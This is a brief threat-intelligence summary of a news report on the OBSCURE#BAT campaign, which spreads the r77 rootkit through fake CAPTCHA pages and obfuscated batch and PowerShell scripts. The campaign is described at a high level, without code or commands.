Summary: A new malware campaign, dubbed OBSCURE#BAT, deploys an open-source rootkit called r77 through social engineering tactics, primarily targeting English-speaking users in the US, Canada, Germany, and the UK. The campaign utilizes obfuscated Windows batch scripts and PowerShell commands to establish persistence while evading detection. Security researchers highlighted its ability to masquerade as legitimate software and employ various misleading strategies to lure victims into executing the malicious scripts.
Affected: Users in the United States, Canada, Germany, and the United Kingdom
Keypoints :
- OBSCURE#BAT leverages social engineering tactics, including fake software downloads and CAPTCHA scams.
- The attack starts with a malicious batch script that uses PowerShell to deliver a more complex payload.
- The malware can modify registry keys, implement persistence techniques, and stay hidden while monitoring clipboard activity.
Source: https://thehackernews.com/2025/03/obscurebat-malware-uses-fake-captcha.html